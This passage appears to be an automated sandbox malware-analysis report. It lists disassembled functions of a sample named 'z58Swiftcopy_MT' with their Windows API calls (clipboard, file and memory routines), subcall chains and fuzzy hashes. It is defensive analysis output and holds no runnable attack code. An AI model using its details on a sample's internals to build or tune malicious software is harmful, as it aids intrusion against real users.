                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                                                                                                                                                                                                                      • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                                                                                                      Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                        • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                                                        • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                                                        • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3655998216-0
                                                                                                                                                                                                                                      • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                                                                                                                                                                      • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                                                                                                      Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445426
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1828521557-0
                                                                                                                                                                                                                                      • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                                                                                                                                                      • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                                                                                      Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                        • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@FilePointermemcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 609303285-0
                                                                                                                                                                                                                                      • Opcode ID: ff2b83ec1290d704cc9ef70c9b0cd29b753561e2494ca983cce7aef5439f8322
                                                                                                                                                                                                                                      • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff2b83ec1290d704cc9ef70c9b0cd29b753561e2494ca983cce7aef5439f8322
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                                                                                                      Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2136311172-0
                                                                                                                                                                                                                                      • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                                      • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                                                                                      Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@??3@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1936579350-0
                                                                                                                                                                                                                                      • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                                                                                                                                                      • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                                                                                                      Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                                                                                                      • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                                                                      • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                                                                                                      Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                                                                                                      • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                                                                                      • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                                                                                                                      Function 00415308 Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                                                                                                      • Opcode ID: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                                                                                                                                                      • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D

                                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                                      Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3604893535-0
                                                                                                                                                                                                                                      • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                                                                      • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                                                                                                                                      Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1213725291-0
                                                                                                                                                                                                                                      • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                                                                                                                                                                      • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                                                                                                                                      Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                                      • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                                                                                                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00418370
                                                                                                                                                                                                                                        • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,762CDF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                                                        • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                                                                                                      • String ID: OsError 0x%x (%u)
                                                                                                                                                                                                                                      • API String ID: 2360000266-2664311388
                                                                                                                                                                                                                                      • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                                                                                                      • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                                                                                                      Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1865533344-0
                                                                                                                                                                                                                                      • Opcode ID: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                                                                                                                                                                      • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                                                                                                                                                      Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: NtdllProc_Window
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4255912815-0
                                                                                                                                                                                                                                      • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                                                                                                      • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                                                                                                                                                      Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                                                                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                                                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040265F
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                                                                                                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
